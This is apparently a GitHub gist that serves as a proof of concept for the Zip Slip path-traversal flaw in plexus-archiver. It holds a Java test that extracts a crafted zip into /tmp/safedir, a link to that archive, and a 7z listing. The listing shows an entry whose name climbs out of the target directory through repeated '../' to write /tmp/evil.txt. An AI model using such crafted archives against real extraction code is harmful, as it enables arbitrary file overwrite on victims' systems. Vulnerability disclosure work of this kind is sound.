Skip to content

Instantly share code, notes, and snippets.

@grnd

grnd/sample.java Secret

Last active November 8, 2018 00:57
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save grnd/eafd7dab7c4cc6197d817a07fa46b2df to your computer and use it in GitHub Desktop.
Save grnd/eafd7dab7c4cc6197d817a07fa46b2df to your computer and use it in GitHub Desktop.
Download ZIP
plexus-archiver
Raw
sample.java
public void testExtractingZipWithTraversal()
throws Exception
{
File testZip = new File("zip-slip.zip");
File targetDirectory = new File("/tmp/safedir");
ZipUnArchiver zu = getZipUnArchiver( testZip );
zu.extract( "", targetDirectory );
}
Raw
zip-slip.md

zip-slip.zip is located here: https://drive.google.com/file/d/1c1zOYm0YTF79IncwmklRLEJIjR11cesL/view?usp=sharing

$ 7z l zip-slip.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,4 CPUs x64)

Scanning the drive for archives:
1 file, 545 bytes (1 KiB)

Listing archive: zip-slip.zip

--
Path = zip-slip.zip
Type = zip
Physical Size = 545

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt
------------------- ----- ------------ ------------  ------------------------
2018-04-15 22:04:42                 39           39  2 files
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment